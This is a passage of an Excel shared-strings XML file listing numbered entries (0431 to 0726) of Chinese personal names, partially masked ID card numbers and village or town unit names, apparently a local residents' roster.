    <t>0431</t>
  </si>
  <si>
    <t>仝凌举</t>
  </si>
  <si>
    <t>411321********0014</t>
  </si>
  <si>
    <t>0432</t>
  </si>
  <si>
    <t>吴青风</t>
  </si>
  <si>
    <t>0433</t>
  </si>
  <si>
    <t>李林德</t>
  </si>
  <si>
    <t>0434</t>
  </si>
  <si>
    <t>李德敏</t>
  </si>
  <si>
    <t>412921********0065</t>
  </si>
  <si>
    <t>0435</t>
  </si>
  <si>
    <t>杜保云</t>
  </si>
  <si>
    <t>0436</t>
  </si>
  <si>
    <t>范永旺</t>
  </si>
  <si>
    <t>0437</t>
  </si>
  <si>
    <t>张天凤</t>
  </si>
  <si>
    <t>0438</t>
  </si>
  <si>
    <t>卞勤</t>
  </si>
  <si>
    <t>0439</t>
  </si>
  <si>
    <t>赵明</t>
  </si>
  <si>
    <t>0440</t>
  </si>
  <si>
    <t>赵远振</t>
  </si>
  <si>
    <t>411326********3613</t>
  </si>
  <si>
    <t>0441</t>
  </si>
  <si>
    <t>张庆兰</t>
  </si>
  <si>
    <t>0442</t>
  </si>
  <si>
    <t>史长勤</t>
  </si>
  <si>
    <t>412921********5527</t>
  </si>
  <si>
    <t>0443</t>
  </si>
  <si>
    <t>王晓</t>
  </si>
  <si>
    <t>0444</t>
  </si>
  <si>
    <t>城关北外村</t>
  </si>
  <si>
    <t>常洪彦</t>
  </si>
  <si>
    <t>0445</t>
  </si>
  <si>
    <t>王家豪</t>
  </si>
  <si>
    <t>411321********0019</t>
  </si>
  <si>
    <t>0446</t>
  </si>
  <si>
    <t>刘保林</t>
  </si>
  <si>
    <t>0447</t>
  </si>
  <si>
    <t>王淑芝</t>
  </si>
  <si>
    <t>412921********0245</t>
  </si>
  <si>
    <t>0448</t>
  </si>
  <si>
    <t>邵新</t>
  </si>
  <si>
    <t>0449</t>
  </si>
  <si>
    <t>吉春旭</t>
  </si>
  <si>
    <t>412921********1510</t>
  </si>
  <si>
    <t>0450</t>
  </si>
  <si>
    <t>刘青芳</t>
  </si>
  <si>
    <t>411326********0040</t>
  </si>
  <si>
    <t>0451</t>
  </si>
  <si>
    <t>谷春方</t>
  </si>
  <si>
    <t>0452</t>
  </si>
  <si>
    <t>沈金焕</t>
  </si>
  <si>
    <t>0453</t>
  </si>
  <si>
    <t>邵龙</t>
  </si>
  <si>
    <t>0454</t>
  </si>
  <si>
    <t>王明春</t>
  </si>
  <si>
    <t>0455</t>
  </si>
  <si>
    <t>张沛</t>
  </si>
  <si>
    <t>0456</t>
  </si>
  <si>
    <t>石洪建</t>
  </si>
  <si>
    <t>412921********0079</t>
  </si>
  <si>
    <t>0457</t>
  </si>
  <si>
    <t>李玉敏</t>
  </si>
  <si>
    <t>0458</t>
  </si>
  <si>
    <t>杨广武</t>
  </si>
  <si>
    <t>412921********0318</t>
  </si>
  <si>
    <t>0459</t>
  </si>
  <si>
    <t>汤孝民</t>
  </si>
  <si>
    <t>0460</t>
  </si>
  <si>
    <t>杨寿杰</t>
  </si>
  <si>
    <t>412921********4043</t>
  </si>
  <si>
    <t>0461</t>
  </si>
  <si>
    <t>闫刚</t>
  </si>
  <si>
    <t>412921********0119</t>
  </si>
  <si>
    <t>0462</t>
  </si>
  <si>
    <t>范自秀</t>
  </si>
  <si>
    <t>0463</t>
  </si>
  <si>
    <t>城关镇北外村</t>
  </si>
  <si>
    <t>王付梅</t>
  </si>
  <si>
    <t>0464</t>
  </si>
  <si>
    <t>张心玲</t>
  </si>
  <si>
    <t>0465</t>
  </si>
  <si>
    <t>向广英</t>
  </si>
  <si>
    <t>412921********2941</t>
  </si>
  <si>
    <t>0466</t>
  </si>
  <si>
    <t>郑爱芬</t>
  </si>
  <si>
    <t>0467</t>
  </si>
  <si>
    <t>段芳</t>
  </si>
  <si>
    <t>0468</t>
  </si>
  <si>
    <t>马润坤</t>
  </si>
  <si>
    <t>411326********0027</t>
  </si>
  <si>
    <t>0469</t>
  </si>
  <si>
    <t>白广荣</t>
  </si>
  <si>
    <t>0470</t>
  </si>
  <si>
    <t>蒋丰梅</t>
  </si>
  <si>
    <t>0471</t>
  </si>
  <si>
    <t>王爱臣</t>
  </si>
  <si>
    <t>0472</t>
  </si>
  <si>
    <t>郭新芳</t>
  </si>
  <si>
    <t>0473</t>
  </si>
  <si>
    <t>余明</t>
  </si>
  <si>
    <t>0474</t>
  </si>
  <si>
    <t>郭书杰</t>
  </si>
  <si>
    <t>0475</t>
  </si>
  <si>
    <t>刘国勤</t>
  </si>
  <si>
    <t>0476</t>
  </si>
  <si>
    <t>侯其华</t>
  </si>
  <si>
    <t>0477</t>
  </si>
  <si>
    <t>丁国顺</t>
  </si>
  <si>
    <t>0478</t>
  </si>
  <si>
    <t>闫玉轩</t>
  </si>
  <si>
    <t>412922********2057</t>
  </si>
  <si>
    <t>0479</t>
  </si>
  <si>
    <t>蔺三</t>
  </si>
  <si>
    <t>0480</t>
  </si>
  <si>
    <t>薛志云</t>
  </si>
  <si>
    <t>0481</t>
  </si>
  <si>
    <t>吴保伟</t>
  </si>
  <si>
    <t>0482</t>
  </si>
  <si>
    <t>隋春雷</t>
  </si>
  <si>
    <t>0483</t>
  </si>
  <si>
    <t>隋宏振</t>
  </si>
  <si>
    <t>411321********0018</t>
  </si>
  <si>
    <t>0484</t>
  </si>
  <si>
    <t>任兴强</t>
  </si>
  <si>
    <t>0485</t>
  </si>
  <si>
    <t xml:space="preserve">郭玉芝 </t>
  </si>
  <si>
    <t>0486</t>
  </si>
  <si>
    <t>蔡庆昌</t>
  </si>
  <si>
    <t>0487</t>
  </si>
  <si>
    <t>雷彬</t>
  </si>
  <si>
    <t>0488</t>
  </si>
  <si>
    <t>庞大方</t>
  </si>
  <si>
    <t>0489</t>
  </si>
  <si>
    <t>张金华</t>
  </si>
  <si>
    <t>412921********0163</t>
  </si>
  <si>
    <t>0490</t>
  </si>
  <si>
    <t>蒋小云</t>
  </si>
  <si>
    <t>0491</t>
  </si>
  <si>
    <t>朱运喜</t>
  </si>
  <si>
    <t>0492</t>
  </si>
  <si>
    <t>城关镇东北东北六组</t>
  </si>
  <si>
    <t>许小焕</t>
  </si>
  <si>
    <t>0493</t>
  </si>
  <si>
    <t>李书良</t>
  </si>
  <si>
    <t>412921********0133</t>
  </si>
  <si>
    <t>0494</t>
  </si>
  <si>
    <t>刘清亮</t>
  </si>
  <si>
    <t>0495</t>
  </si>
  <si>
    <t>邓秀</t>
  </si>
  <si>
    <t>0496</t>
  </si>
  <si>
    <t>高中付</t>
  </si>
  <si>
    <t>0497</t>
  </si>
  <si>
    <t>靳德连</t>
  </si>
  <si>
    <t>0498</t>
  </si>
  <si>
    <t>李天才</t>
  </si>
  <si>
    <t>0499</t>
  </si>
  <si>
    <t>张保仁</t>
  </si>
  <si>
    <t>0500</t>
  </si>
  <si>
    <t>张阳</t>
  </si>
  <si>
    <t>0501</t>
  </si>
  <si>
    <t>王相明</t>
  </si>
  <si>
    <t>0502</t>
  </si>
  <si>
    <t>徐振方</t>
  </si>
  <si>
    <t>0503</t>
  </si>
  <si>
    <t>张金龙</t>
  </si>
  <si>
    <t>0504</t>
  </si>
  <si>
    <t>李焕</t>
  </si>
  <si>
    <t>0505</t>
  </si>
  <si>
    <t>贾桂兰</t>
  </si>
  <si>
    <t>0506</t>
  </si>
  <si>
    <t>文德庆</t>
  </si>
  <si>
    <t>0507</t>
  </si>
  <si>
    <t>张秀会</t>
  </si>
  <si>
    <t>0508</t>
  </si>
  <si>
    <t>汪大琴</t>
  </si>
  <si>
    <t>0509</t>
  </si>
  <si>
    <t>马作平</t>
  </si>
  <si>
    <t>412921********0348</t>
  </si>
  <si>
    <t>0510</t>
  </si>
  <si>
    <t>随广菊</t>
  </si>
  <si>
    <t>0511</t>
  </si>
  <si>
    <t>王菊花</t>
  </si>
  <si>
    <t>0512</t>
  </si>
  <si>
    <t>陈海芳</t>
  </si>
  <si>
    <t>0513</t>
  </si>
  <si>
    <t>崔国荣</t>
  </si>
  <si>
    <t>0514</t>
  </si>
  <si>
    <t>李玉军</t>
  </si>
  <si>
    <t>0515</t>
  </si>
  <si>
    <t>王春生</t>
  </si>
  <si>
    <t>412921********0075</t>
  </si>
  <si>
    <t>0516</t>
  </si>
  <si>
    <t>陈荣珍</t>
  </si>
  <si>
    <t>412921********0263</t>
  </si>
  <si>
    <t>0517</t>
  </si>
  <si>
    <t>刘德祥</t>
  </si>
  <si>
    <t>412921********0237</t>
  </si>
  <si>
    <t>0518</t>
  </si>
  <si>
    <t>牛清杰</t>
  </si>
  <si>
    <t>0519</t>
  </si>
  <si>
    <t>刘洋</t>
  </si>
  <si>
    <t>0520</t>
  </si>
  <si>
    <t>赵玉燕</t>
  </si>
  <si>
    <t>412921********024X</t>
  </si>
  <si>
    <t>0521</t>
  </si>
  <si>
    <t>张萍</t>
  </si>
  <si>
    <t>0522</t>
  </si>
  <si>
    <t>赵书琴</t>
  </si>
  <si>
    <t>412921********0281</t>
  </si>
  <si>
    <t>0523</t>
  </si>
  <si>
    <t>杨福群</t>
  </si>
  <si>
    <t>412921********007X</t>
  </si>
  <si>
    <t>0524</t>
  </si>
  <si>
    <t>蔡伟</t>
  </si>
  <si>
    <t>0525</t>
  </si>
  <si>
    <t>梁泽波</t>
  </si>
  <si>
    <t>0526</t>
  </si>
  <si>
    <t>梁锦程</t>
  </si>
  <si>
    <t>411321********0132</t>
  </si>
  <si>
    <t>0527</t>
  </si>
  <si>
    <t>李先平</t>
  </si>
  <si>
    <t>412921********5284</t>
  </si>
  <si>
    <t>0528</t>
  </si>
  <si>
    <t>任洪军</t>
  </si>
  <si>
    <t>0529</t>
  </si>
  <si>
    <t>符伟</t>
  </si>
  <si>
    <t>0530</t>
  </si>
  <si>
    <t>张燕</t>
  </si>
  <si>
    <t>0531</t>
  </si>
  <si>
    <t>刘青梅</t>
  </si>
  <si>
    <t>0532</t>
  </si>
  <si>
    <t>刘德有</t>
  </si>
  <si>
    <t>412921********029X</t>
  </si>
  <si>
    <t>0533</t>
  </si>
  <si>
    <t>贺荣芳</t>
  </si>
  <si>
    <t>412921********0327</t>
  </si>
  <si>
    <t>0534</t>
  </si>
  <si>
    <t>陈庆芳</t>
  </si>
  <si>
    <t>0535</t>
  </si>
  <si>
    <t>王鑫梦</t>
  </si>
  <si>
    <t>411321********0043</t>
  </si>
  <si>
    <t>0536</t>
  </si>
  <si>
    <t>吴峰</t>
  </si>
  <si>
    <t>0537</t>
  </si>
  <si>
    <t>张晓薇</t>
  </si>
  <si>
    <t>412921********3660</t>
  </si>
  <si>
    <t>0538</t>
  </si>
  <si>
    <t>李中震</t>
  </si>
  <si>
    <t>0539</t>
  </si>
  <si>
    <t>张学建</t>
  </si>
  <si>
    <t>0540</t>
  </si>
  <si>
    <t>赵国勤</t>
  </si>
  <si>
    <t>0541</t>
  </si>
  <si>
    <t>高书强</t>
  </si>
  <si>
    <t>0542</t>
  </si>
  <si>
    <t>李林春</t>
  </si>
  <si>
    <t>0543</t>
  </si>
  <si>
    <t>李兴兰</t>
  </si>
  <si>
    <t>0544</t>
  </si>
  <si>
    <t>邵金元</t>
  </si>
  <si>
    <t>0545</t>
  </si>
  <si>
    <t>郭新珍</t>
  </si>
  <si>
    <t>0546</t>
  </si>
  <si>
    <t>城关镇西北</t>
  </si>
  <si>
    <t>张熙迅</t>
  </si>
  <si>
    <t>411321********0073</t>
  </si>
  <si>
    <t>0547</t>
  </si>
  <si>
    <t>城关镇中华</t>
  </si>
  <si>
    <t>刘长海</t>
  </si>
  <si>
    <t>0548</t>
  </si>
  <si>
    <t>刘俊梅</t>
  </si>
  <si>
    <t>0549</t>
  </si>
  <si>
    <t>褚青明</t>
  </si>
  <si>
    <t>411326********2411</t>
  </si>
  <si>
    <t>0550</t>
  </si>
  <si>
    <t>周旭</t>
  </si>
  <si>
    <t>411321********5116</t>
  </si>
  <si>
    <t>0551</t>
  </si>
  <si>
    <t>张涵</t>
  </si>
  <si>
    <t>411321********0068</t>
  </si>
  <si>
    <t>0552</t>
  </si>
  <si>
    <t>张统</t>
  </si>
  <si>
    <t>411321********6130</t>
  </si>
  <si>
    <t>0553</t>
  </si>
  <si>
    <t>褚松梅</t>
  </si>
  <si>
    <t>412921********0264</t>
  </si>
  <si>
    <t>0554</t>
  </si>
  <si>
    <t>韩桂套</t>
  </si>
  <si>
    <t>0555</t>
  </si>
  <si>
    <t>董正英</t>
  </si>
  <si>
    <t>0556</t>
  </si>
  <si>
    <t>张金平</t>
  </si>
  <si>
    <t>0557</t>
  </si>
  <si>
    <t>马全兴</t>
  </si>
  <si>
    <t>0558</t>
  </si>
  <si>
    <t>雷建朝</t>
  </si>
  <si>
    <t>0559</t>
  </si>
  <si>
    <t>蔡花</t>
  </si>
  <si>
    <t>0560</t>
  </si>
  <si>
    <t>法秀钦</t>
  </si>
  <si>
    <t>0561</t>
  </si>
  <si>
    <t>崔建生</t>
  </si>
  <si>
    <t>0562</t>
  </si>
  <si>
    <t>华德芳</t>
  </si>
  <si>
    <t>0563</t>
  </si>
  <si>
    <t>刘发祥</t>
  </si>
  <si>
    <t>0564</t>
  </si>
  <si>
    <t>靳洪梅</t>
  </si>
  <si>
    <t>0565</t>
  </si>
  <si>
    <t>李树强</t>
  </si>
  <si>
    <t>412921********2811</t>
  </si>
  <si>
    <t>0566</t>
  </si>
  <si>
    <t>王瑞兰</t>
  </si>
  <si>
    <t>0567</t>
  </si>
  <si>
    <t>张书军</t>
  </si>
  <si>
    <t>0568</t>
  </si>
  <si>
    <t>韩桂芝</t>
  </si>
  <si>
    <t>0569</t>
  </si>
  <si>
    <t>张永莲</t>
  </si>
  <si>
    <t>0570</t>
  </si>
  <si>
    <t>张德霞</t>
  </si>
  <si>
    <t>0571</t>
  </si>
  <si>
    <t>张书征</t>
  </si>
  <si>
    <t>0572</t>
  </si>
  <si>
    <t>郭德献</t>
  </si>
  <si>
    <t>0573</t>
  </si>
  <si>
    <t>尹玉春</t>
  </si>
  <si>
    <t>0574</t>
  </si>
  <si>
    <t>王运芝</t>
  </si>
  <si>
    <t>0575</t>
  </si>
  <si>
    <t>柏洪山</t>
  </si>
  <si>
    <t>0576</t>
  </si>
  <si>
    <t>王文会</t>
  </si>
  <si>
    <t>412921********0104</t>
  </si>
  <si>
    <t>0577</t>
  </si>
  <si>
    <t>李杰</t>
  </si>
  <si>
    <t>0578</t>
  </si>
  <si>
    <t>谷大伟</t>
  </si>
  <si>
    <t>0579</t>
  </si>
  <si>
    <t>苗青杰</t>
  </si>
  <si>
    <t>0580</t>
  </si>
  <si>
    <t>尚玉勤</t>
  </si>
  <si>
    <t>412921********0181</t>
  </si>
  <si>
    <t>0581</t>
  </si>
  <si>
    <t>张清云</t>
  </si>
  <si>
    <t>0582</t>
  </si>
  <si>
    <t>李国勤</t>
  </si>
  <si>
    <t>0583</t>
  </si>
  <si>
    <t>宋华伟</t>
  </si>
  <si>
    <t>0584</t>
  </si>
  <si>
    <t>田付炬</t>
  </si>
  <si>
    <t>0585</t>
  </si>
  <si>
    <t>田启锋</t>
  </si>
  <si>
    <t>411321********0017</t>
  </si>
  <si>
    <t>0586</t>
  </si>
  <si>
    <t>高相云</t>
  </si>
  <si>
    <t>0587</t>
  </si>
  <si>
    <t>王德兰</t>
  </si>
  <si>
    <t>0588</t>
  </si>
  <si>
    <t>张福海</t>
  </si>
  <si>
    <t>412921********0090</t>
  </si>
  <si>
    <t>0589</t>
  </si>
  <si>
    <t>汤惠银</t>
  </si>
  <si>
    <t>411321********0026</t>
  </si>
  <si>
    <t>0590</t>
  </si>
  <si>
    <t>郑多勤</t>
  </si>
  <si>
    <t>0591</t>
  </si>
  <si>
    <t>吕春斗</t>
  </si>
  <si>
    <t>412921********0374</t>
  </si>
  <si>
    <t>0592</t>
  </si>
  <si>
    <t>贾红广</t>
  </si>
  <si>
    <t>0593</t>
  </si>
  <si>
    <t>李金贵</t>
  </si>
  <si>
    <t>412921********4027</t>
  </si>
  <si>
    <t>0594</t>
  </si>
  <si>
    <t>李彦霖</t>
  </si>
  <si>
    <t>411326********0129</t>
  </si>
  <si>
    <t>0595</t>
  </si>
  <si>
    <t>郑慎振</t>
  </si>
  <si>
    <t>411321********3314</t>
  </si>
  <si>
    <t>0596</t>
  </si>
  <si>
    <t>董大永</t>
  </si>
  <si>
    <t>411326********0015</t>
  </si>
  <si>
    <t>0597</t>
  </si>
  <si>
    <t>董佳欣</t>
  </si>
  <si>
    <t>411321********5344</t>
  </si>
  <si>
    <t>0598</t>
  </si>
  <si>
    <t>吴荣林</t>
  </si>
  <si>
    <t>0599</t>
  </si>
  <si>
    <t>冯勤</t>
  </si>
  <si>
    <t>0600</t>
  </si>
  <si>
    <t>石贤中</t>
  </si>
  <si>
    <t>0601</t>
  </si>
  <si>
    <t>白小玲</t>
  </si>
  <si>
    <t>0602</t>
  </si>
  <si>
    <t>师新杰</t>
  </si>
  <si>
    <t>412921********1167</t>
  </si>
  <si>
    <t>0603</t>
  </si>
  <si>
    <t>任龙</t>
  </si>
  <si>
    <t>411326********003X</t>
  </si>
  <si>
    <t>0604</t>
  </si>
  <si>
    <t>曾俊英</t>
  </si>
  <si>
    <t>0605</t>
  </si>
  <si>
    <t>刘丙朝</t>
  </si>
  <si>
    <t>0606</t>
  </si>
  <si>
    <t>北外社区</t>
  </si>
  <si>
    <t>刘中亮</t>
  </si>
  <si>
    <t>0607</t>
  </si>
  <si>
    <t>裴华</t>
  </si>
  <si>
    <t>0608</t>
  </si>
  <si>
    <t>孔德华</t>
  </si>
  <si>
    <t>0609</t>
  </si>
  <si>
    <t>刘中举</t>
  </si>
  <si>
    <t>0610</t>
  </si>
  <si>
    <t>城关西北</t>
  </si>
  <si>
    <t>王宏斌</t>
  </si>
  <si>
    <t>0611</t>
  </si>
  <si>
    <t>王健</t>
  </si>
  <si>
    <t>0612</t>
  </si>
  <si>
    <t>尹延娜</t>
  </si>
  <si>
    <t>411326********0029</t>
  </si>
  <si>
    <t>0613</t>
  </si>
  <si>
    <t>城关中华</t>
  </si>
  <si>
    <t>栗桂杰</t>
  </si>
  <si>
    <t>0614</t>
  </si>
  <si>
    <t>李录荣</t>
  </si>
  <si>
    <t>0615</t>
  </si>
  <si>
    <t>马小壮</t>
  </si>
  <si>
    <t>0616</t>
  </si>
  <si>
    <t>马鑫钰</t>
  </si>
  <si>
    <t>411326********0024</t>
  </si>
  <si>
    <t>0617</t>
  </si>
  <si>
    <t>徐文丰</t>
  </si>
  <si>
    <t>412921********4421</t>
  </si>
  <si>
    <t>0618</t>
  </si>
  <si>
    <t>张红亮</t>
  </si>
  <si>
    <t>0619</t>
  </si>
  <si>
    <t>韩付勤</t>
  </si>
  <si>
    <t>0620</t>
  </si>
  <si>
    <t>城关东北</t>
  </si>
  <si>
    <t>马万阁</t>
  </si>
  <si>
    <t>0621</t>
  </si>
  <si>
    <t>樊金山</t>
  </si>
  <si>
    <t>411326********0053</t>
  </si>
  <si>
    <t>0622</t>
  </si>
  <si>
    <t>司保莲</t>
  </si>
  <si>
    <t>0623</t>
  </si>
  <si>
    <t>高书敏</t>
  </si>
  <si>
    <t>0624</t>
  </si>
  <si>
    <t>李玉强</t>
  </si>
  <si>
    <t>0625</t>
  </si>
  <si>
    <t>席云秀</t>
  </si>
  <si>
    <t>0626</t>
  </si>
  <si>
    <t>蒋廷瑞</t>
  </si>
  <si>
    <t>0627</t>
  </si>
  <si>
    <t>杨万荣</t>
  </si>
  <si>
    <t>0628</t>
  </si>
  <si>
    <t>王勇</t>
  </si>
  <si>
    <t>411326********0033</t>
  </si>
  <si>
    <t>0629</t>
  </si>
  <si>
    <t>郭永信</t>
  </si>
  <si>
    <t>0630</t>
  </si>
  <si>
    <t>王玉勤</t>
  </si>
  <si>
    <t>412921********0084</t>
  </si>
  <si>
    <t>0631</t>
  </si>
  <si>
    <t>王艺</t>
  </si>
  <si>
    <t>411326********0021</t>
  </si>
  <si>
    <t>0632</t>
  </si>
  <si>
    <t>张东洋</t>
  </si>
  <si>
    <t>411326********0446</t>
  </si>
  <si>
    <t>0633</t>
  </si>
  <si>
    <t>张世珍</t>
  </si>
  <si>
    <t>412921********0421</t>
  </si>
  <si>
    <t>0634</t>
  </si>
  <si>
    <t>代天荣</t>
  </si>
  <si>
    <t>0635</t>
  </si>
  <si>
    <t>芦明成</t>
  </si>
  <si>
    <t>0636</t>
  </si>
  <si>
    <t>李书爱</t>
  </si>
  <si>
    <t>0637</t>
  </si>
  <si>
    <t>魏文丽</t>
  </si>
  <si>
    <t>0638</t>
  </si>
  <si>
    <t>杨玉强</t>
  </si>
  <si>
    <t>0639</t>
  </si>
  <si>
    <t>刘清泉</t>
  </si>
  <si>
    <t>411321********0030</t>
  </si>
  <si>
    <t>0640</t>
  </si>
  <si>
    <t>刘清宇</t>
  </si>
  <si>
    <t>411321********0156</t>
  </si>
  <si>
    <t>0641</t>
  </si>
  <si>
    <t>张宗荣</t>
  </si>
  <si>
    <t>0642</t>
  </si>
  <si>
    <t>贾宗超</t>
  </si>
  <si>
    <t>0643</t>
  </si>
  <si>
    <t>闫学会</t>
  </si>
  <si>
    <t>412921********0120</t>
  </si>
  <si>
    <t>0644</t>
  </si>
  <si>
    <t>王召凤</t>
  </si>
  <si>
    <t>411321********0205</t>
  </si>
  <si>
    <t>0645</t>
  </si>
  <si>
    <t>闫清山</t>
  </si>
  <si>
    <t>411321********5156</t>
  </si>
  <si>
    <t>0646</t>
  </si>
  <si>
    <t>任冀</t>
  </si>
  <si>
    <t>0647</t>
  </si>
  <si>
    <t>王清彦</t>
  </si>
  <si>
    <t>0648</t>
  </si>
  <si>
    <t>黄芝云</t>
  </si>
  <si>
    <t>0649</t>
  </si>
  <si>
    <t>城关北外</t>
  </si>
  <si>
    <t>朱晓峰</t>
  </si>
  <si>
    <t>0650</t>
  </si>
  <si>
    <t>张建遇</t>
  </si>
  <si>
    <t>0651</t>
  </si>
  <si>
    <t>杜金平</t>
  </si>
  <si>
    <t>412921********3887</t>
  </si>
  <si>
    <t>0652</t>
  </si>
  <si>
    <t>董希东</t>
  </si>
  <si>
    <t>0653</t>
  </si>
  <si>
    <t>田芳</t>
  </si>
  <si>
    <t>0654</t>
  </si>
  <si>
    <t>董金丽</t>
  </si>
  <si>
    <t>0655</t>
  </si>
  <si>
    <t>刘炳强</t>
  </si>
  <si>
    <t>0656</t>
  </si>
  <si>
    <t>郭春云</t>
  </si>
  <si>
    <t>0657</t>
  </si>
  <si>
    <t>靳三鹏</t>
  </si>
  <si>
    <t>0658</t>
  </si>
  <si>
    <t>李帮玲</t>
  </si>
  <si>
    <t>0659</t>
  </si>
  <si>
    <t>刘中强</t>
  </si>
  <si>
    <t>0660</t>
  </si>
  <si>
    <t>乔瑞</t>
  </si>
  <si>
    <t>0661</t>
  </si>
  <si>
    <t>邵青连</t>
  </si>
  <si>
    <t>0662</t>
  </si>
  <si>
    <t>张支桂</t>
  </si>
  <si>
    <t>0663</t>
  </si>
  <si>
    <t>韩桂花</t>
  </si>
  <si>
    <t>0664</t>
  </si>
  <si>
    <t>刘清敏</t>
  </si>
  <si>
    <t>0665</t>
  </si>
  <si>
    <t>城关沙坪</t>
  </si>
  <si>
    <t>王荣军</t>
  </si>
  <si>
    <t>0666</t>
  </si>
  <si>
    <t>王超</t>
  </si>
  <si>
    <t>0667</t>
  </si>
  <si>
    <t>城关东北村</t>
  </si>
  <si>
    <t>王荣基</t>
  </si>
  <si>
    <t>411321********5638</t>
  </si>
  <si>
    <t>0668</t>
  </si>
  <si>
    <t>张丽</t>
  </si>
  <si>
    <t>0669</t>
  </si>
  <si>
    <t>张建</t>
  </si>
  <si>
    <t>0670</t>
  </si>
  <si>
    <t>孙长荣</t>
  </si>
  <si>
    <t>0671</t>
  </si>
  <si>
    <t>韩中远</t>
  </si>
  <si>
    <t>412921********2492</t>
  </si>
  <si>
    <t>0672</t>
  </si>
  <si>
    <t>王付明</t>
  </si>
  <si>
    <t>0673</t>
  </si>
  <si>
    <t>刘钦然</t>
  </si>
  <si>
    <t>411326********3629</t>
  </si>
  <si>
    <t>0674</t>
  </si>
  <si>
    <t>王兴平</t>
  </si>
  <si>
    <t>0675</t>
  </si>
  <si>
    <t>孙朝梅</t>
  </si>
  <si>
    <t>0676</t>
  </si>
  <si>
    <t>苏长荣</t>
  </si>
  <si>
    <t>0677</t>
  </si>
  <si>
    <t>城关中华村</t>
  </si>
  <si>
    <t>宋天云</t>
  </si>
  <si>
    <t>0678</t>
  </si>
  <si>
    <t>狄延飞</t>
  </si>
  <si>
    <t>0679</t>
  </si>
  <si>
    <t>徐振红</t>
  </si>
  <si>
    <t>0680</t>
  </si>
  <si>
    <t>李炫非</t>
  </si>
  <si>
    <t>0681</t>
  </si>
  <si>
    <t>李冠桦</t>
  </si>
  <si>
    <t>411321********0134</t>
  </si>
  <si>
    <t>0682</t>
  </si>
  <si>
    <t>吴其伟</t>
  </si>
  <si>
    <t>0683</t>
  </si>
  <si>
    <t>刘昱灼</t>
  </si>
  <si>
    <t>411321********5609</t>
  </si>
  <si>
    <t>0684</t>
  </si>
  <si>
    <t>郭相玉</t>
  </si>
  <si>
    <t>0685</t>
  </si>
  <si>
    <t>崔雪</t>
  </si>
  <si>
    <t>0686</t>
  </si>
  <si>
    <t>城关西北村</t>
  </si>
  <si>
    <t>王运强</t>
  </si>
  <si>
    <t>0687</t>
  </si>
  <si>
    <t>王冬冬</t>
  </si>
  <si>
    <t>411326********0010</t>
  </si>
  <si>
    <t>0688</t>
  </si>
  <si>
    <t>贾作保</t>
  </si>
  <si>
    <t>411326********0059</t>
  </si>
  <si>
    <t>0689</t>
  </si>
  <si>
    <t>张继元</t>
  </si>
  <si>
    <t>411321********445X</t>
  </si>
  <si>
    <t>0690</t>
  </si>
  <si>
    <t>张万庆</t>
  </si>
  <si>
    <t>412921********0358</t>
  </si>
  <si>
    <t>0691</t>
  </si>
  <si>
    <t>蔡松</t>
  </si>
  <si>
    <t>0692</t>
  </si>
  <si>
    <t>蔡千姿</t>
  </si>
  <si>
    <t>411321********0186</t>
  </si>
  <si>
    <t>0693</t>
  </si>
  <si>
    <t>司建春</t>
  </si>
  <si>
    <t>412929********1340</t>
  </si>
  <si>
    <t>0694</t>
  </si>
  <si>
    <t>杨立琴</t>
  </si>
  <si>
    <t>0695</t>
  </si>
  <si>
    <t>张振敏</t>
  </si>
  <si>
    <t>0696</t>
  </si>
  <si>
    <t>李娟</t>
  </si>
  <si>
    <t>411381********1763</t>
  </si>
  <si>
    <t>0697</t>
  </si>
  <si>
    <t>王兴军</t>
  </si>
  <si>
    <t>0698</t>
  </si>
  <si>
    <t>段辛辛</t>
  </si>
  <si>
    <t>411321********0045</t>
  </si>
  <si>
    <t>0699</t>
  </si>
  <si>
    <t>城关镇工信局</t>
  </si>
  <si>
    <t>王俊云</t>
  </si>
  <si>
    <t>412921********442X</t>
  </si>
  <si>
    <t>0700</t>
  </si>
  <si>
    <t>沈海莲</t>
  </si>
  <si>
    <t>0701</t>
  </si>
  <si>
    <t>刘德华</t>
  </si>
  <si>
    <t>0702</t>
  </si>
  <si>
    <t>城关镇政府</t>
  </si>
  <si>
    <t>吉召勤</t>
  </si>
  <si>
    <t>0703</t>
  </si>
  <si>
    <t>高玉成</t>
  </si>
  <si>
    <t>0704</t>
  </si>
  <si>
    <t>张文定</t>
  </si>
  <si>
    <t>412919********0194</t>
  </si>
  <si>
    <t>0705</t>
  </si>
  <si>
    <t>王万荣</t>
  </si>
  <si>
    <t>0706</t>
  </si>
  <si>
    <t>邢明珍</t>
  </si>
  <si>
    <t>0707</t>
  </si>
  <si>
    <t>郭廷仓</t>
  </si>
  <si>
    <t>0708</t>
  </si>
  <si>
    <t>王文兰</t>
  </si>
  <si>
    <t>0709</t>
  </si>
  <si>
    <t>贺启航</t>
  </si>
  <si>
    <t>0710</t>
  </si>
  <si>
    <t>城关政府</t>
  </si>
  <si>
    <t>黄浩瀚</t>
  </si>
  <si>
    <t>411326********0418</t>
  </si>
  <si>
    <t>0711</t>
  </si>
  <si>
    <t>城关镇东北</t>
  </si>
  <si>
    <t>张德松</t>
  </si>
  <si>
    <t>0712</t>
  </si>
  <si>
    <t>周连芝</t>
  </si>
  <si>
    <t>0713</t>
  </si>
  <si>
    <t>张军</t>
  </si>
  <si>
    <t>0714</t>
  </si>
  <si>
    <t>王玉玲</t>
  </si>
  <si>
    <t>222404********0020</t>
  </si>
  <si>
    <t>0715</t>
  </si>
  <si>
    <t>王曼笛</t>
  </si>
  <si>
    <t>411321********0366</t>
  </si>
  <si>
    <t>0716</t>
  </si>
  <si>
    <t>张彩瑞</t>
  </si>
  <si>
    <t>411321********0060</t>
  </si>
  <si>
    <t>0717</t>
  </si>
  <si>
    <t>沙玉亭</t>
  </si>
  <si>
    <t>412921********0177</t>
  </si>
  <si>
    <t>0718</t>
  </si>
  <si>
    <t>李聪聪</t>
  </si>
  <si>
    <t>411321********0322</t>
  </si>
  <si>
    <t>0719</t>
  </si>
  <si>
    <t>李华珍</t>
  </si>
  <si>
    <t>412921********0860</t>
  </si>
  <si>
    <t>0720</t>
  </si>
  <si>
    <t>曹德东</t>
  </si>
  <si>
    <t>0721</t>
  </si>
  <si>
    <t>王继新</t>
  </si>
  <si>
    <t>0722</t>
  </si>
  <si>
    <t>赵志祥</t>
  </si>
  <si>
    <t>0723</t>
  </si>
  <si>
    <t>陈立兰</t>
  </si>
  <si>
    <t>0724</t>
  </si>
  <si>
    <t>薛志梅</t>
  </si>
  <si>
    <t>0725</t>
  </si>
  <si>
    <t>刘闯</t>
  </si>
  <si>
    <t>411326********0030</t>
  </si>
  <si>
    <t>0726</t>
  </si>
  <si>
    <t>毛德安</t>
  </si>
  <si>
